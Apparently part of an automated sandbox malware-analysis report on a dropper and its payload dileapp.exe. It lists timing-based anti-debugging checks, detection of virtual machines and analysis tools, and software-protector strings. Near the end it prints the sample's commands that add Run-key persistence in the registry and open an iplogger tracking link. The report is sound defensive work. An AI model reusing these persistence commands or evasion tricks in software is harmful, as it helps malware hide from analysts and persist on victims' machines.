                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E6183 second address: 11E61D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a movsx ecx, dx 0x0000000d lea eax, dword ptr [ebp+1391FB0Dh] 0x00000013 sbb dx, 5D33h 0x00000018 mov di, si 0x0000001b nop 0x0000001c push ecx 0x0000001d jnp 00007FCCB120DFDCh 0x00000023 pop ecx 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 jmp 00007FCCB120DFE8h 0x0000002d push edx 0x0000002e pop edx 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1233527 second address: 1233552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FCCB120DFDDh 0x0000000b popad 0x0000000c jns 00007FCCB120DFDEh 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop edx 0x00000016 popad 0x00000017 pushad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123355E second address: 123357E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FCCB0D02D08h 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FCCB0D02D11h 0x00000014 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1233AD7 second address: 1233AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB120DFE3h 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1233C46 second address: 1233C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FCCB120DFDAh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1233C5B second address: 1233C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB0D02D11h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FCCB0D02D06h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1233C7B second address: 1233C90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FCCB120DFDAh 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1236D92 second address: 1236DA9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCCB0D02D0Ch 0x00000008 je 00007FCCB0D02D06h 0x0000000e push ebx 0x0000000f jnl 00007FCCB0D02D06h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1239515 second address: 1239536 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCCB0D02D06h 0x00000008 jmp 00007FCCB0D02D0Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f js 00007FCCB0D02D0Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123FC4F second address: 123FC71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FCCB120DFE7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123F54D second address: 123F5A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FCCB0D02D18h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FCCB0D02D18h 0x00000019 popad 0x0000001a push edi 0x0000001b jmp 00007FCCB0D02D14h 0x00000020 pushad 0x00000021 popad 0x00000022 pop edi 0x00000023 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123F5AF second address: 123F5BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FCCB120DFDCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12429E2 second address: 1242A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FCCB120DFE0h 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007FCCB120DFE5h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12498F1 second address: 1249901 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FCCB120DFD6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1249909 second address: 124993C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jne 00007FCCB0D02D06h 0x00000011 jmp 00007FCCB0D02D16h 0x00000016 popad 0x00000017 push edx 0x00000018 jg 00007FCCB0D02D06h 0x0000001e pop edx 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 124807D second address: 124809A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jc 00007FCCB120DFD6h 0x0000000c jmp 00007FCCB120DFDFh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 124835C second address: 124837C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 jmp 00007FCCB120DFE6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 124851D second address: 1248527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FCCB0D02D06h 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1248527 second address: 1248543 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1248547 second address: 1248557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB120DFDAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E5B4F second address: 11E5BC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FCCB120DFDAh 0x0000000c pop ecx 0x0000000d popad 0x0000000e nop 0x0000000f mov edi, dword ptr [ebp+13763215h] 0x00000015 mov dword ptr [ebp+13761C71h], edi 0x0000001b mov ebx, dword ptr [ebp+1391FB4Ch] 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 call 00007FCCB120DFD8h 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], ecx 0x0000002e add dword ptr [esp+04h], 00000019h 0x00000036 inc ecx 0x00000037 push ecx 0x00000038 ret 0x00000039 pop ecx 0x0000003a ret 0x0000003b mov di, C6D2h 0x0000003f add eax, ebx 0x00000041 mov edx, dword ptr [ebp+13762A90h] 0x00000047 nop 0x00000048 pushad 0x00000049 pushad 0x0000004a jmp 00007FCCB120DFE4h 0x0000004f pushad 0x00000050 popad 0x00000051 popad 0x00000052 push eax 0x00000053 push edx 0x00000054 push edi 0x00000055 pop edi 0x00000056 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E5BDC second address: 11E5BE6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCCB0D02D0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1248B76 second address: 1248B91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D15h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1251EF7 second address: 1251F06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FCCB120DFD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1251F06 second address: 1251F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB0D02D10h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1251F21 second address: 1251F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB120DFDAh 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1251F2F second address: 1251F55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnc 00007FCCB0D02D06h 0x0000000f jmp 00007FCCB0D02D12h 0x00000014 push esi 0x00000015 pop esi 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 125057E second address: 125059C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D18h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 125059C second address: 12505B9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCCB120DFE3h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1254FC3 second address: 1254FDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D0Fh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1254FE6 second address: 1255007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB120DFE1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007FCCB120DFD6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 125500B second address: 125501B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jbe 00007FCCB120DFD6h 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1255030 second address: 1255061 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007FCCB0D02D1Dh 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12555FD second address: 1255625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FCCB0D02D06h 0x0000000a popad 0x0000000b jmp 00007FCCB0D02D15h 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FCCB0D02D06h 0x00000018 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1255907 second address: 125591F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D14h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 125A98D second address: 125A99B instructions: 0x00000000 rdtsc 0x00000002 jno 00007FCCB120DFD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12623E1 second address: 12623FF instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCCB120DFD8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FCCB120DFDFh 0x00000014 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1262E12 second address: 1262E1C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCCB0D02D06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12630C9 second address: 12630EF instructions: 0x00000000 rdtsc 0x00000002 jne 00007FCCB0D02D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ecx 0x0000000c jmp 00007FCCB0D02D16h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1263224 second address: 126323D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FCCB0D02D06h 0x0000000d push esi 0x0000000e pop esi 0x0000000f js 00007FCCB0D02D06h 0x00000015 popad 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 126323D second address: 1263279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 jo 00007FCCB120DFDAh 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 js 00007FCCB120DFDEh 0x00000017 ja 00007FCCB120DFD6h 0x0000001d push edx 0x0000001e pop edx 0x0000001f pushad 0x00000020 jl 00007FCCB120DFD6h 0x00000026 jng 00007FCCB120DFD6h 0x0000002c jmp 00007FCCB120DFDBh 0x00000031 popad 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1263279 second address: 1263283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FCCB0D02D06h 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1263A62 second address: 1263A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB0D02D13h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCCB0D02D0Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1279FEB second address: 127A000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB120DFDFh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 127C9F1 second address: 127CA16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB0D02D12h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jbe 00007FCCB0D02D06h 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exe Special instruction interceptor: First address: 1028A0E instructions caused by: Self-modifying code
                Source: C:\Users\Public\Netstat\dileapp.exe Special instruction interceptor: First address: 1028AE0 instructions caused by: Self-modifying code
                Source: C:\Users\Public\Netstat\dileapp.exe Special instruction interceptor: First address: 11DD0BC instructions caused by: Self-modifying code
                Source: C:\Users\Public\Netstat\dileapp.exe Special instruction interceptor: First address: 127055A instructions caused by: Self-modifying code
                Source: C:\Users\Public\Netstat\dileapp.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\Public\Netstat\dileapp.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\Public\Netstat\dileapp.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\Public\Netstat\dileapp.exe TID: 7804 Thread sleep time: -30000s >= -30000s
                Source: C:\Users\Public\Netstat\dileapp.exe TID: 8132 Thread sleep time: -180000s >= -30000s
                Source: C:\Users\Public\Netstat\dileapp.exe TID: 8128 Thread sleep time: -30000s >= -30000s
                Source: C:\Users\Public\Netstat\dileapp.exe TID: 2084 Thread sleep time: -120000s >= -30000s
                Source: C:\Users\Public\Netstat\dileapp.exe TID: 2084 Thread sleep time: -30000s >= -30000s
                Source: C:\Users\Public\Netstat\dileapp.exe TID: 7668 Thread sleep time: -150000s >= -30000s
                Source: C:\Users\Public\Netstat\dileapp.exe TID: 7668 Thread sleep time: -30000s >= -30000s
                Source: C:\Users\Public\Netstat\dileapp.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0079A273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0079A273
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007AA537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_007AA537
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007AC8D5 VirtualQuery,GetSystemInfo,0_2_007AC8D5
                Source: dileapp.exe, dileapp.exe, 0000000F.00000002.2133477904.00000000011BB000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1650610820.00000000014F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: dileapp.exe, 0000000F.00000003.2132165164.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000002.2133135957.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132518246.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%
                Source: file.exe, 00000000.00000002.1650610820.00000000014F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: dileapp.exe, 00000005.00000002.1749018639.0000000001538000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000005.00000003.1740218351.0000000001576000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000005.00000002.1749018639.0000000001576000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000002.1969913350.000000000099C000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1969012358.000000000099C000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000002.2052375189.0000000001ABB000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000002.2052375189.0000000001A7F000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.2050545971.0000000001ABB000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.2050545971.0000000001A7F000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132165164.0000000000EBF000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132165164.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: dileapp.exe, 00000005.00000002.1749018639.000000000155A000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000005.00000003.1740218351.000000000155A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWj
                Source: file.exe Binary or memory string: vmCI$
                Source: dileapp.exe, 00000009.00000003.1969012358.000000000095F000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000002.1969913350.000000000095F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(p
                Source: dileapp.exe, 00000005.00000002.1748276179.00000000011BB000.00000040.00000001.01000000.00000009.sdmp, dileapp.exe, 00000009.00000002.1970769378.00000000011BB000.00000040.00000001.01000000.00000009.sdmp, dileapp.exe, 0000000C.00000002.2051325861.00000000011BB000.00000040.00000001.01000000.00000009.sdmp, dileapp.exe, 0000000F.00000002.2133477904.00000000011BB000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: dileapp.exe, 00000009.00000002.1969913350.000000000098F000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1969012358.000000000098F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%H
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-22647
                Source: C:\Users\Public\Netstat\dileapp.exe System information queried: ModuleInformation
                Source: C:\Users\Public\Netstat\dileapp.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\Public\Netstat\dileapp.exe Thread information set: HideFromDebugger
                Source: C:\Users\Public\Netstat\dileapp.exe Open window title or class name: regmonclass
                Source: C:\Users\Public\Netstat\dileapp.exe Open window title or class name: gbdyllo
                Source: C:\Users\Public\Netstat\dileapp.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\Public\Netstat\dileapp.exe Open window title or class name: procmon_window_class
                Source: C:\Users\Public\Netstat\dileapp.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\Public\Netstat\dileapp.exe Open window title or class name: ollydbg
                Source: C:\Users\Public\Netstat\dileapp.exe Open window title or class name: filemonclass
                Source: C:\Users\Public\Netstat\dileapp.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\Public\Netstat\dileapp.exe File opened: NTICE
                Source: C:\Users\Public\Netstat\dileapp.exe File opened: SICE
                Source: C:\Users\Public\Netstat\dileapp.exe File opened: SIWVID
                Source: C:\Users\Public\Netstat\dileapp.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007ADA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007ADA75
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007B4A5A mov eax, dword ptr fs:[00000030h] 0_2_007B4A5A
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007B8AAA GetProcessHeap,0_2_007B8AAA
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007B5B53 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007B5B53
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007ADBC3 SetUnhandledExceptionFilter,0_2_007ADBC3
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007ADD7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_007ADD7C
                Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" "
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\Netstat\dileapp.exe C:\Users\Public\Netstat\dileapp.exe
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.co/1tJFB4
                Source: dileapp.exe Binary or memory string: ,}kProgram Manager
                Source: dileapp.exe, 00000009.00000002.1970769378.00000000011BB000.00000040.00000001.01000000.00000009.sdmp, dileapp.exe, 0000000F.00000002.2133477904.00000000011BB000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: ,}kProgram Manager
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007AD8CB cpuid 0_2_007AD8CB
                Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetNumberFormatW,0_2_007A932F
                Source: C:\Users\Public\Netstat\dileapp.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007AC131 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,0_2_007AC131
